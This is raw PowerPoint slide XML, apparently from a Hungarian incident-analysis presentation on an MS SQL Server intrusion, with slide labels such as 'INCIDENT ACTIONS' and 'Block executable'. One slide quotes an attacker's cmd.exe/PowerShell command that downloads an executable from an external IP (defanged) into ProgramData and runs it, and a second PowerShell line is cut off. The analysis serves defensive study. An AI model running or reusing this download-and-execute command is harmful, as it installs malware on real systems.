            <p:spPr>
              <a:xfrm>
                <a:off x="6574689" y="5858532"/>
                <a:ext cx="3416388" cy="707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Block executable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A736F5E-2459-1FCF-2C1E-3E4E22D152E9}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6574689" y="6751666"/>
                <a:ext cx="3938233" cy="707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Unblock executable</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="23" name="Graphic 22">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95250634-5C8D-0432-DA4E-5BAF185DE3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p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="5782139" y="2645078"/>
                <a:ext cx="523582" cy="523582"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="24" name="Graphic 23">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2A62937-DD0B-C530-BC79-2A183F13D4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p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="5763440" y="3501119"/>
                <a:ext cx="560981" cy="560981"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="25" name="Graphic 24">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{688440DE-73AF-7D60-00A2-0488B0831E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p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="5763440" y="4716713"/>
                <a:ext cx="560981" cy="560981"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="26" name="Graphic 25">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48300336-2AF0-C5FE-8B6A-97020AE6A9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p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="5782139" y="5919906"/>
                <a:ext cx="523582" cy="523582"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic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7762B9-A067-692C-EBED-68BC45B7AD21}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5760212" y="4420881"/>
                <a:ext cx="5616625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4D2D03B7-72BD-0116-ED5D-6B502D407B68}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5760212" y="5547932"/>
                <a:ext cx="5616625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A8878091-57BF-428B-E805-BA20CB860336}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5660289" y="7975601"/>
              <a:ext cx="5716548" cy="1168399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720000" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-GB" sz="1800">
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>INCIDENT ACTIONS</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Triangle 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E111D16A-E6CD-849A-0D40-B7DEFE18E1E9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="10594664" y="8465598"/>
              <a:ext cx="426260" cy="210887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720000" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="sk-SK" sz="3200">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:endParaRP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7A41A7B8-9835-A174-C5EF-D724D87462F9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5660289" y="2457634"/>
              <a:ext cx="5716546" cy="940360"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF0000">
                <a:alpha val="10272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720000" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="52" name="Group 156">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A198153B-E046-2E0C-155E-875A4026021A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3832622" y="575130"/>
            <a:ext cx="1205793" cy="1205793"/>
            <a:chOff x="9228675" y="2933048"/>
            <a:chExt cx="4118889" cy="4118889"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="53" name="Group 157">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50806D0E-6F5F-8BE6-01D7-1233E88D8AC1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="9228675" y="2933048"/>
              <a:ext cx="4118889" cy="4118889"/>
              <a:chOff x="7931149" y="2626295"/>
              <a:chExt cx="4118889" cy="4118889"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="55" name="Group 159">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{825C668A-81CB-463F-A357-228AE18F2A66}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="11339954" y="3278140"/>
                <a:ext cx="522194" cy="527315"/>
                <a:chOff x="3190875" y="974570"/>
                <a:chExt cx="249325" cy="251770"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="57" name="Rectangle 161">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A683408-4A22-AF01-DB95-1771C30360D6}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3190875" y="974570"/>
                  <a:ext cx="112232" cy="1130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25"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="58" name="Rectangle 162">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD02AB51-D9A7-9D35-1B0A-F17501941121}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3327968" y="974570"/>
                  <a:ext cx="112232" cy="1130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25"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="59" name="Rectangle 163">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E2CE5D8-F002-535C-E08B-03B0ABF9A7E0}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3190875" y="1113316"/>
                  <a:ext cx="112232" cy="1130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25"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="60" name="Rectangle 164">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{660EB8AC-5E6F-1A68-30D3-1C26B5414452}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3327968" y="1113316"/>
                  <a:ext cx="112232" cy="1130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25"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="56" name="Graphic 160">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{403DCE12-6EC6-5323-7A1D-B911703FFF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96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                    <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" xmlns="" r:embed="rId22"/>
                  </a:ext>
                </a:extLst>
              </a:blip>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="7931149" y="2626295"/>
                <a:ext cx="4118889" cy="4118889"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="54" name="Oval 158">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DD5AFDD-7C68-20A5-4F7B-0EB5F18A1FA3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10515933" y="4127841"/>
              <a:ext cx="1578270" cy="46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</p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="!!Agenda">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D353D653-61A0-B693-BB4F-C4CB001ADC6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1623038" y="924990"/>
            <a:ext cx="5358657" cy="838155"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr" defTabSz="187631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923"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="1862" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1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defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="4754" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="4754" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="4754" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> SQL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4754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53987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701AA7-1EC1-9B02-6884-76D937B3A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Gradient TEAL" descr="A green light in the dark&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E866A0EA-E59C-E92D-66EF-7B9856D7910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144721" y="-5037820"/>
            <a:ext cx="30087414" cy="18514850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="!!Gradient PURPLE" descr="A purple line in the dark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5EFF8EB-9057-2EF4-FF19-282458EC41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849229" y="1284780"/>
            <a:ext cx="30560502" cy="18285230"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="!!Gradient CRIMSON" descr="A red light in the dark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFA9292D-C728-7783-EB56-2DC451E383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14407705" y="-5577283"/>
            <a:ext cx="13607400" cy="8690365"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="!!Gradient TEAL Fat" descr="A blue oval with black background&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72D9E5D1-6104-7D73-91C8-C176F7FF7BC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-12354021" y="5703318"/>
            <a:ext cx="19335716" cy="13730680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" hidden="1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D1C5AB7-7437-B360-6FD0-0A1723E629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78127" y="-67586"/>
            <a:ext cx="13425772" cy="10189508"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="122" name="Group 121">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76254A70-755A-EA47-7CC4-72755538FFCC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="914400" y="2580993"/>
            <a:ext cx="16459200" cy="1447675"/>
            <a:chOff x="914400" y="2120365"/>
            <a:chExt cx="16459200" cy="144767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74DAFCB-5E2F-D511-550A-F66EE1177B5E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="914400" y="2120365"/>
              <a:ext cx="16459200" cy="1447675"/>
              <a:chOff x="9783551" y="1103017"/>
              <a:chExt cx="16459200" cy="1447675"/>
            </a:xfrm>
          </p:grpSpPr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FD6EC485-F3E0-8DD1-D58A-3CFC9C04B08C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9783551" y="1103017"/>
                <a:ext cx="16459200" cy="1447675"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 6307"/>
                </a:avLst>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="000D13"/>
              </a:solidFill>
              <a:ln>
                <a:solidFill>
                  <a:srgbClr val="424D56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K"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="29" name="Graphic 28">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A23D6D86-4B7F-056F-DD6E-46356A37CF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rcRect/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="10126322" y="1300398"/>
                <a:ext cx="549560" cy="335445"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="31" name="Rectangle: Rounded Corners 28">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80A21B04-7C6E-2E40-F638-A2BDF6A44A65}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9928226" y="1818603"/>
                <a:ext cx="16134415" cy="608118"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="1079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811382">
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="1800" kern="0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%SYSTEM%\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1800" kern="0" err="1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cmd.exe</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1800" kern="0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”C:\Windows\\System32\\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1800" kern="0" err="1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cmd.exe</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1800" kern="0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” /C echo $cl = New-Object </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1800" kern="0" err="1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System.Net.WebClient</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1800" kern="0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&gt;C:?\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1800" kern="0" err="1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ProgramData</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1800" kern="0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\\updt.ps1 &amp; echo $</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1800" kern="0" err="1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cl.DownloadFile</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1800" kern="0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(“</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1800" kern="0" err="1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hxxp</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1800" kern="0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://80.66.75[.]47/</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1800" kern="0" err="1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Dxccaejs.exe</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1800" kern="0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”, ”C:?\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1800" kern="0" err="1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ProgramData</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1800" kern="0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\\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1800" kern="0" err="1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tzt.bat</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1800" kern="0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”) &gt;&gt; C:?\</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1800" kern="0" err="1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ProgramData</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1800" kern="0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\\updt.ps1</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="139" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C3634E1-EF52-0624-0423-9FCDBE0D691B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1862260" y="2244337"/>
              <a:ext cx="6098468" cy="467642"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln cap="rnd">
              <a:noFill/>
              <a:round/>
            </a:ln>
            <a:effectLst>
              <a:glow rad="63500">
                <a:schemeClr val="accent4">
                  <a:alpha val="40000"/>
                </a:schemeClr>
              </a:glow>
              <a:outerShdw blurRad="381000" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
                <a:srgbClr val="D80B55"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="1371600"/>
              <a:r>
                <a:rPr lang="en-US" sz="1600">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Administrator: C:\\Windows\system32\</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>cmd.exe</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="125" name="TextBox 124">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3C7934D-ACE0-1399-929D-7F00908E5D2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1059075" y="1660917"/>
            <a:ext cx="94273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MS SQL Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>parancs szétszedése</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-SK" sz="28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4885242-E7D8-7EDA-D56C-1123A416500F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="914400" y="6463734"/>
            <a:ext cx="16459200" cy="1190491"/>
            <a:chOff x="914400" y="2120365"/>
            <a:chExt cx="16459200" cy="119049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DFC4193-07B0-568B-C3F5-61A8DAC47FD6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="914400" y="2120365"/>
              <a:ext cx="16459200" cy="1190491"/>
              <a:chOff x="9783551" y="1103017"/>
              <a:chExt cx="16459200" cy="1190491"/>
            </a:xfrm>
          </p:grpSpPr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B8EEE5DB-486D-345B-E9A7-9559CC195607}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9783551" y="1103017"/>
                <a:ext cx="16459200" cy="1190491"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 6307"/>
                </a:avLst>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="000D13"/>
              </a:solidFill>
              <a:ln>
                <a:solidFill>
                  <a:srgbClr val="424D56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K"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="13" name="Graphic 12">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{392F63A2-37B6-7A2B-7087-463FC6544F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rcRect/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="10126322" y="1300398"/>
                <a:ext cx="549560" cy="335445"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="14" name="Rectangle: Rounded Corners 28">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{483FFD20-5B83-E245-1201-793BBC424EC3}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9928226" y="1725707"/>
                <a:ext cx="16134415" cy="467642"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="1079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811382">
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="1800" kern="0" err="1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powershell</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1800" kern="0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–</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="1800" kern="0" err="1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ExecutionPolicy</a:t>
                </a:r>
                <a:r>
